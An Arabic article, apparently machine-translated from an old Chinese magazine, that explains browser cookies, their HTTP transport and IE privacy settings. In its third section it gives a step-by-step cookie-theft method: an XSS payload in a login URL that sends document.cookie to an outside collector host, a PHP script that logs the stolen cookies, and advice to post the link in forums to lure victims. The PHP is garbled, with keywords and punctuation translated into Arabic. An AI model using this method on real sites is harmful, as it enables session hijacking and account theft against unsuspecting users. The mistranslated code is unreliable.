كلمة "كوكي" تعني حلوى صغيرة باللغة الإنجليزية، ويمكننا دائمًا رؤية هذه الكلمة في المتصفح. كيف يمكن ربط الطعام بالمتصفح؟ عندما تتصفح أحد مواقع الويب التي قمت بتسجيل الدخول إليها من قبل، قد ترى الرسالة التالية على صفحة الويب: مرحبًا XX، يبدو الأمر ودودًا للغاية، تمامًا مثل تناول حلوى صغيرة. يتم تحقيق ذلك فعليًا عن طريق الوصول إلى ملف في مضيفك، لذلك يُسمى هذا الملف أيضًا ملف تعريف الارتباط. هل تريد معرفة كل شيء عن ملفات تعريف الارتباط؟ نلقي نظرة أدناه!
1. فهم ملفات تعريف الارتباط القابلة للتطبيق: ملفات تعريف الارتباط للقراء المبتدئين
هي ملف نصي صغير يخزنه موقع الويب على جهازك عندما تتصفح موقعًا على الويب. وهو يسجل معرف المستخدم وكلمة المرور وصفحات الويب التي تتصفحها والوقت الذي تقضيه ومعلومات أخرى، عند زيارتك إلى موقع الويب مرة أخرى، يتعرف موقع الويب على معلوماتك ذات الصلة من خلال قراءة ملف تعريف الارتباط، ويمكنه اتخاذ الإجراءات المقابلة، مثل عرض شعار يرحب بك على الصفحة، أو السماح لك بالتصفح مباشرة دون إدخال معرفك أو كلمة المرور الخاصة بك، والمزيد . يمكنك عرض جميع ملفات تعريف الارتباط المحفوظة على جهاز الكمبيوتر الخاص بك عن طريق تحديد "الإعدادات/عرض الملفات" في علامة التبويب "عام" ضمن "الأدوات/خيارات الإنترنت" في IE. تتم تسمية هذه الملفات عادةً بالتنسيق user@domain ، حيث user هو اسم المستخدم المحلي الخاص بك والمجال هو اسم المجال لموقع الويب الذي تزوره. إذا كنت تستخدم متصفح NetsCape، فسيتم تخزينه في "C:PROGRAMFILESNETSCAPEUSERS". وبخلاف IE، يستخدم NETSCAPE ملف تعريف الارتباط لتسجيل ملفات تعريف الارتباط لجميع مواقع الويب.
من أجل ضمان أمن الإنترنت، نحتاج إلى تعيين ملفات تعريف الارتباط بشكل مناسب. افتح علامة التبويب "الخصوصية" في "الأدوات/خيارات الإنترنت" (لاحظ أن هذا الإعداد موجود فقط في IE6.0، ويمكن للإصدارات الأخرى من IE النقر فوق "مستوى مخصص" في علامة التبويب "الأمان" في زر "الأدوات/خيارات الإنترنت" إجراء تعديلات بسيطة) لضبط مستوى الأمان لملفات تعريف الارتباط. يمكنك عادةً ضبط شريط التمرير على الوضع "متوسط-مرتفع" أو "مرتفع". تتطلب معظم مواقع المنتديات استخدام معلومات ملفات تعريف الارتباط. إذا لم تذهب إلى هذه الأماكن مطلقًا، فيمكنك ضبط مستوى الأمان على "حظر كافة ملفات تعريف الارتباط". إذا كنت تريد فقط حظر ملفات تعريف الارتباط من مواقع الويب الفردية، فيمكنك النقر فوق الزر "تحرير" لإضافة مواقع الويب التي تريد حظرها إلى القائمة. في خيار الزر "متقدم"، يمكنك تعيين ملفات تعريف الارتباط للطرف الأول وملفات تعريف الارتباط للطرف الثالث هي ملفات تعريف الارتباط من موقع الويب الذي تتصفحه، وملفات تعريف الارتباط للطرف الثالث ليست ملفات تعريف الارتباط المرسلة إليك من موقع الويب الذي تتصفحه. عادةً ما يتعين عليك اختيار "رفض" لملفات تعريف الارتباط الخاصة بالجهات الخارجية، كما هو موضح في الشكل 1. إذا كنت بحاجة إلى حفظ ملفات تعريف الارتباط، فيمكنك استخدام وظيفة "الاستيراد والتصدير" في IE، وفتح "ملف/استيراد وتصدير"، واتباع المطالبات.
يتم تشفير معظم المحتوى الموجود في ملف تعريف الارتباط، لذلك يبدو لنا أنه مجرد مزيج لا معنى له من الأحرف والأرقام، ولا يعرف معناها الحقيقي سوى معالج CGI الخاص بالخادم. يمكننا عرض المزيد من المحتوى من خلال بعض البرامج. تظهر معلومات ملفات تعريف الارتباط التي يتم عرضها باستخدام برنامج Cookie Pal في الشكل 2. فهو يزودنا بمحتويات الخادم وانتهاء الصلاحية والاسم والقيمة والخيارات الأخرى. من بينها، الخادم هو موقع الويب الذي يقوم بتخزين ملفات تعريف الارتباط، ويسجل انتهاء الصلاحية الوقت وعمر ملف تعريف الارتباط، وحقول الاسم والقيمة عبارة عن بيانات محددة (تحتوي هذه الصحيفة على مقدمة مفصلة لهذا البرنامج في العدد 10، الصفحة 42).
عنوان التنزيل: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. عملية تسليم ملفات تعريف الارتباط الكائنات القابلة للتطبيق: القراء المتوسطون عندما يكتبون عنوان URL لموقع ويب في شريط عنوان المتصفح، سيرسل المتصفح طلبًا لقراءة صفحة الويب إلى موقع الويب ويعرض النتيجة على الشاشة. في هذا الوقت، تبحث صفحة الويب عن ملف تعريف الارتباط الذي وضعه موقع أمازون على جهاز الكمبيوتر الخاص بك، وإذا تم العثور عليه، فسيرسل المتصفح البيانات الموجودة في ملف تعريف الارتباط مع عنوان URL الذي تم إدخاله مسبقًا إلى خادم أمازون. عندما يتلقى الخادم بيانات ملفات تعريف الارتباط، فإنه سيقوم باسترداد هويتك وسجلات التسوق والتفضيلات الشخصية والمعلومات الأخرى في قاعدة البيانات الخاصة به، وتسجيل المحتوى الجديد وإضافته إلى قاعدة البيانات وملفات تعريف الارتباط. إذا لم يتم اكتشاف أي ملف تعريف ارتباط أو كانت معلومات ملف تعريف الارتباط الخاصة بك لا تتطابق مع المعلومات الموجودة في قاعدة البيانات، فهذا يعني أنك تتصفح موقع الويب لأول مرة، وسيقوم برنامج CGI الخاص بالخادم بإنشاء معلومات معرف جديدة لك وحفظها في قاعدة البيانات.
يتم نقل ملفات تعريف الارتباط باستخدام معلومات رأس HTTP في رمز صفحة الويب. ويمكن نقل ملفات تعريف الارتباط مع كل طلب صفحة ويب يقدمه المتصفح، على سبيل المثال، عندما يفتح المتصفح صفحة الويب أو يقوم بتحديثها. يضيف الخادم ملف تعريف الارتباط إلى معلومات رأس HTTP لصفحة الويب، ويرسل بيانات صفحة الويب مرة أخرى إلى متصفحك. سيختار المتصفح ما إذا كان سيتم حفظ هذه البيانات بناءً على إعدادات ملفات تعريف الارتباط على جهاز الكمبيوتر الخاص بك. إذا كان المتصفح لا يسمح بحفظ ملفات تعريف الارتباط، فستختفي البيانات بعد إغلاق المتصفح. يختلف الوقت الذي يتم فيه تخزين ملفات تعريف الارتباط على جهاز الكمبيوتر الخاص بك، والذي يتم تحديده من خلال إعدادات الخادم. تحتوي ملفات تعريف الارتباط على سمة انتهاء الصلاحية (فترة الصلاحية)، والتي تحدد وقت تخزين ملف تعريف الارتباط. يمكن للخادم تغيير وقت تخزين ملف تعريف الارتباط عن طريق تعيين قيمة حقل انتهاء الصلاحية. إذا لم يتم تعيين هذه السمة، فإن ملفات تعريف الارتباط تكون صالحة فقط أثناء تصفح الويب. إذا قمت بإغلاق المتصفح، فسوف تختفي ملفات تعريف الارتباط هذه تلقائيًا. عادةً، يحتوي ملف تعريف الارتباط على حقول "الخادم" و"انتهاء الصلاحية" و"الاسم" و"القيمة". تكون حقول "الاسم" و"القيمة" فقط مفيدة للخادم. إن محتويات "انتهاء الصلاحية" والحقول الأخرى هي فقط لإخبار المتصفح بكيفية معالجة ملفات تعريف الارتباط هذه.
3. تنفيذ برمجة ملفات تعريف الارتباط الكائنات القابلة للتطبيق: القراء المتقدمون توفر معظم لغات برمجة الويب الدعم لملفات تعريف الارتباط. مثل JavaScript، VBScript، Delphi، ASP، SQL، PHP، C#، إلخ. في لغات البرمجة الموجهة للكائنات، يكون استخدام برمجة ملف تعريف الارتباط مشابهًا بشكل أساسي. العملية العامة هي: قم أولاً بإنشاء كائن ملف تعريف الارتباط (كائن)، ثم استخدم وظيفة التحكم لتعيين ملف تعريف الارتباط والقراءة والكتابة والعمليات الأخرى. فكيف يمكن الحصول على معلومات حساسة في ملفات تعريف الارتباط الخاصة بالمستخدمين الآخرين من خلال الكود؟ يلي مقدمة موجزة.
تتكون هذه الطريقة من خطوتين رئيسيتين. أولاً، حدد موقع الويب الذي تحتاجه لجمع ملفات تعريف الارتباط وتحليله وإنشاء عنوان URL؛ ثم قم بتجميع كود PHP لجمع ملفات تعريف الارتباط ووضعه على موقع ويب يمكنك التحكم فيه، دون معرفة PHP يمكن تنفيذ التعليمات البرمجية بعد أن ينقر المستخدم على عنوان URL الذي أنشأته. دعونا نلقي نظرة على عملية التنفيذ المحددة أدناه.
1. قم بتحليل عنوان URL وإنشائه.
افتح أولاً موقع الويب الذي نريد جمع ملفات تعريف الارتباط فيه. هنا نفترض أنه http://www.XXX.net قم بتسجيل الدخول إلى موقع الويب وأدخل اسم المستخدم "<A1>" (. بدون علامتي الاقتباس) لتحليل البيانات والتقاط الحزم، احصل على رمز على شكل "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x. =28&ok.y=6"، استبدل "<A1>" حاول مرة أخرى لـ "<script>alert(document.cookie)</script>"؛ إذا نجح التنفيذ، فابدأ في إنشاء عنوان URL: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php؟"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". من بينها، http:///www.cbifamily.org/cbi.php هو برنامج نصي على مضيف معين يمكنك التحكم فيه. تجدر الإشارة إلى أن "%2B" هو ترميز URL للرمز "+"، لأنه سيتم التعامل مع "+" كمسافة. يمكن نشر عنوان URL في المنتدى لحث الآخرين على النقر عليه.
2. إعداد البرنامج النصي PHP.
وظيفة هذا البرنامج النصي هي جمع ملفات تعريف الارتباط. المحتوى المحدد هو كما يلي:
<?php
$info = getenv("QUERY_STRING");
إذا (معلومات) {
$fp = fopen("info.txt"،"a")؛
fwrite($fp,$info."n");
fClose($fp);
}
header("الموقع: http://www.downcodes.com ");
?>
4. مشكلات أمان ملفات تعريف الارتباط الكائنات القابلة للتطبيق: جميع القراء الذين يريدون أن يكونوا آمنين عبر الإنترنت
1. خداع ملفات تعريف الارتباط
تسجل ملفات تعريف الارتباط معلومات مثل معرفات حساب المستخدم وكلمات المرور، في حالة إرسالها عبر الإنترنت، عادةً ما يتم استخدام تشفير MD5. وحتى لو تم اعتراض المعلومات المشفرة من قبل بعض الأشخاص لدوافع خفية على الإنترنت، فلن يتمكنوا من فهمها لأن كل ما يرونه هو حروف وأرقام لا معنى لها. ومع ذلك، المشكلة الآن هي أن الأشخاص الذين يعترضون ملفات تعريف الارتباط لا يحتاجون إلى معرفة معنى هذه السلاسل، بل يحتاجون فقط إلى إرسال ملفات تعريف الارتباط الخاصة بأشخاص آخرين إلى الخادم، وإذا تمكنوا من اجتياز عملية التحقق، فيمكنهم التظاهر بأنها هوية الضحية وبياناتها. تسجيل الدخول إلى الموقع. تسمى هذه الطريقة انتحال ملفات تعريف الارتباط. الشرط الأساسي لتزييف ملفات تعريف الارتباط هو وجود ثغرة أمنية في برنامج التحقق الخاص بالخادم، وأن يرغب المحتال في الحصول على معلومات ملف تعريف الارتباط الخاصة بالشخص الذي يتم انتحال شخصيته. من الصعب جدًا على برنامج التحقق من موقع الويب الحالي استبعاد جميع عمليات تسجيل الدخول غير القانونية، على سبيل المثال، قد تحتوي اللغة المستخدمة لكتابة برنامج التحقق على ثغرات. علاوة على ذلك، من السهل جدًا الحصول على ملفات تعريف الارتباط الخاصة بالأشخاص الآخرين، ويمكنك تحقيق ذلك عن طريق كتابة جزء صغير من التعليمات البرمجية بلغة تدعم ملفات تعريف الارتباط (راجع التفاصيل في الطريقة الثالثة) طالما تم وضع هذا الرمز على الشبكة، فسيتم حفظ ملفات تعريف الارتباط الخاصة بالجميع يمكن جمعها. إذا كان المنتدى يسمح بكود HTML أو يسمح باستخدام علامات Flash، فيمكنك استخدام هذه التقنيات لجمع أكواد ملفات تعريف الارتباط ووضعها في المنتدى، ثم إعطاء المنشور موضوعًا جذابًا وكتابة محتوى مثير للاهتمام، ويمكنك جمع عدد كبير بسرعة من ملفات تعريف الارتباط. في المنتدى، تمت سرقة كلمات مرور العديد من الأشخاص بهذه الطريقة. أما بالنسبة لكيفية الوقاية منها، فلا يوجد حاليًا علاج محدد، يمكننا فقط استخدام طرق الحماية المعتادة. لا تستخدم كلمات مرور مهمة في المنتديات، ولا تستخدم وظيفة IE لحفظ كلمات المرور تلقائيًا، وحاول عدم تسجيل الدخول إلى مواقع الويب. حيث لا تعرف التفاصيل.
2. المخاطر المخفية لكود الفلاش
هناك وظيفة getURL () في Flash يمكنها استخدام هذه الوظيفة لفتح صفحة ويب محددة تلقائيًا. لذلك قد يقودك إلى موقع ويب يحتوي على تعليمات برمجية ضارة. على سبيل المثال، عندما تستمتع برسوم متحركة فلاشية جميلة على جهاز الكمبيوتر الخاص بك، ربما يكون الكود الموجود في إطار الرسوم المتحركة متصلاً بالإنترنت بهدوء ويفتح صفحة صغيرة جدًا تحتوي على كود خاص. يمكن لهذه الصفحة جمع ملفات تعريف الارتباط الخاصة بك والقيام بأشياء أخرى، مثل زرع أحصنة طروادة على جهازك أو حتى تهيئة محرك الأقراص الثابتة لديك، وما إلى ذلك. لا يمكن لمواقع الويب حظر هذا السلوك لـ Flash لأنه السلوك الداخلي لملفات Flash. ما يمكننا فعله هو محاولة فتح جدار الحماية إذا كنت تتصفح محليًا. إذا طالبك جدار الحماية بعدم معرفة حزم البيانات المرسلة، فمن الأفضل حظرها. إذا كنت ترغب في الاستمتاع بها على الإنترنت، فمن الأفضل أن تجد بعض المواقع الكبيرة المعروفة.